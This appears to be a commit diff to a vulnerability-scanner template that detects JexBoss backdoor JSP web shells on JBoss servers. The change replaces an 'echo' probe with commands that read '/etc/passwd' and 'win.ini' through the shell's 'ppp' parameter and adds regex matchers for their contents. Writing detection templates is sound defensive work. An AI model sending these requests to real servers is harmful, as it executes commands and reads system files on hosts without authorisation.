Update jexboss-backdoor.yaml

2021-12-21 20:57:06 +05:30 · 2021-12-21 20:57:06 +05:30 · 89467e5e14
parent 3184c32ecf
commit 89467e5e14
1 changed files with 15 additions and 12 deletions
--- a/vulnerabilities/backdoor/jexboss-backdoor.yaml
+++ b/vulnerabilities/backdoor/jexboss-backdoor.yaml
@ -12,24 +12,27 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/jexws/jexws.jsp?ppp=echo%20pwn3d"
-      - "{{BaseURL}}/jexws4/jexws4.jsp?ppp=echo%20pwn3d"
-      - "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp=echo%20pwn3d"
-      - "{{BaseURL}}/jbossass/jbossass.jsp?ppp=echo%20pwn3d"
+      - "{{BaseURL}}/jexws/jexws.jsp?ppp={{url_encode('§command§')}}"
+      - "{{BaseURL}}/jexws4/jexws4.jsp?ppp={{url_encode('§command§')}}"
+      - "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp={{url_encode('§command§')}}"
+      - "{{BaseURL}}/jbossass/jbossass.jsp?ppp={{url_encode('§command§')}}"
+
+    payloads:
+      command:
+        - "cat /etc/passwd"
+        - "type C:\\/Windows\\/win.ini"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
+      - type: regex
        part: body
-        words:
-          - "pwn3d"
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or

      - type: word
        part: header
        words:
-          - "X-Powered-By: Servlet"
+          - "X-Powered-By: Servlet"